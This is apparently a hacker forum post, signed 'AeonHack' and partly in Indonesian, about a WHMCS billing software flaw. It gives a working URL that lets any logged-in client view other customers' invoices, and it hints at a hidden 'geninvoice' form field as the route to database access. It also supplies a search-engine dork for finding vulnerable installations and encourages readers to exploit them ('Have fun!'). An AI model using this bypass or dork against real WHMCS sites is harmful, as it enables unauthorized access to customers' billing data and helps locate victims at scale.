I decided to give WHMCS a chance to patch this. The first part of this vulnerability:

Login as a client.
Start your quest at /clientarea.php?action=masspay&invoiceids[]=1&invoiceids[]=2
This will allow you to access any invoice, even if you don't own it.

If you've got what it takes, you'll find out how to exploit this further and get some real database access. 

Ternyata hint ada d sini sebenarnya ->

PHP Code:
<input type="hidden" name="geninvoice" value="true" /> 

Have fun!


Dork : powered by whmcompletesolution inurl:clientarea.php?action=masspay
Selamat ya.

View Source

Regards ,

AeonHack